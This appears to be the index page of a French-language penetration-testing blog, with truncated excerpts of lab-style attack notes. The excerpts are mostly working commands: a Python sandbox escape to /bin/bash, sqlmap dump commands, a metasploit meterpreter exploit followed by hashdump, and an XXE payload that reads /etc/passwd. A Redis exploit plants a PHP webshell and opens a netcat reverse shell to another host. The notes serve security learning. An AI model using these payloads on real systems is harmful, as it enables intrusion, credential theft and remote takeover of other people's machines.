Jailbreak python

Par exemple un script python permet l’exécution de scripts mais restreint l’utilisation des mots eval exec import open os read system write Il est possible d’outrepasser les mesures de sécurité __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')

Attaque SQLMAP

SQL Injection dans un entete HTTP sqlmap –dbms mysql –headers="X-forwarded-for:1*" -u http://10.10.10.10/ -D mydb -T mytable –dump SQL avec une requête BURP sqlmap -r burp.request –dbms mysql -D mydb -T flag –dump

Scripts pour scanner des ports sous Linux

#!/bin/bash ports=(21 22 53 80 443 3306 8443 8080) for port in ${ports[@]}; do timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/1.1.1.1/$port && echo $port is open || /dev/null" done #!/usr/bin/python3 import socket host = "1.1.1.1" portList = [21,22,53,80,443,3306,8443,8080] for port in portList: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try:   s.connect((host,port))   print("Port ", port, " … Continuer la lecture

Attaques Kerberos

Privilège requis par les attaques Kerbrute Enumeration – Pas d’accès au domaine requis Pass the Ticket – Accès au domaine comme un usager Kerberoasting – Accès comme n’importe lequel usager AS-REP Roasting – Accès comme n’importe lequel usager Golden Ticket – Domaine compromis complètement (domain admin) requis Silver Ticket – Service hash requis Skeleton Key … Continuer la lecture

Introduction à metasploit

msfconsole db_nmap -sV 10.9.0.16 hosts services vulns use exploit/windows/http/icecast_header set rhosts 10.9.0.16 set payload windows/meterpreter/reverse_tcp set lhost 10.9.0.15 exploit Dans une session meterpreter (POST Exploitation) getuid sysinfo load kiwi getprivs upload run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 run post/windows/gather/usb_history run post/windows/manage/migrate run post/windows/gather/enum_applications  #voir les applications qui sont installés run post/windows/gather/enum_logged_on_users run post/windows/gther/checkvm run post/multi/recon/local_exploit_suggester run post/windows/gather/hashdump run post/windows/gather/enum_snmp … Continuer la lecture

Énumération du service MySQL avec metasploit

On peut utiliser msfconsole pour exécuter des requêtes sur un serveur MYSQL use auxiliary/admin/mysql/mysql_sql set rhosts 10.9.0.15 set username root set password password run #la requête par défault est "select version()" set sql show databases run Énumération des tables use auxiliary/scanner/mysql/mysql_schemadump set rhosts 10.9.0.15 set username root set password password run Énumération des usagers et … Continuer la lecture

Exploit Redis

redis-cli -h 10.9.0.19 config set dir /var/www/html config set dbfilename shell.php set test "<?php system($_GET['cmd']);?> http://10.9.0.19/shell.php?cmd=nc 10.9.0.15 4444 -e /bin/sh S’il y a un exception, vous pouvez réessayer après avoir fait un backup et vidé la base de données. Ne pas oublier de restorer la bd Get Webshell ​ You must know the physical path … Continuer la lecture

Vulnérabilité XXE

Par exemple, un application envoie ses données sous forme XML <?xml version="1.0" encoding="UTF-8"?> <comment>   <name>Test</name>   <author>Germain</author>   <com>Une description ici.</com> </comment> Il pourrait être possible d’inclure un fichier <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE comment [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <comment>   <name>Test</name>   <author>Germain</author>   <com>Une description ici. &xxe;</com> </comment> Nous pourrions aussi avoir la possibilité d’exécuter do code … Continuer la lecture

SQLite 101

On rencontre souvent des bases de données dans des fichiers .db. La plupart du temps, elles sont au format sqlite Pour lire celle-ci, nous avons recours à l’utilitaire sqlite3 sqlite3 myfile.db Nous pouvons voir les tables dans la base de données .tables Ainsi que la structure de la table PRAGMA table_info(nom_de_la_table) Nous pouvons aussi retrouver … Continuer la lecture

Exploration d’un ActiveDirectory avec nmap , smbclient, GetNPUsers.py, kerbrute et enum4linux

Il est possible de prendre possession d’un ActiveDiectory si nous réussissons à cracker le mot de passe de l’administrateur. On commence par énumérer les services présents sur le AD r0cker@kali:~$ sudo nmap -p- -A -nP 10.10.74.213 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 07:17 EDT Nmap scan report for 10.10.74.213 Host is up (0.086s … Continuer la lecture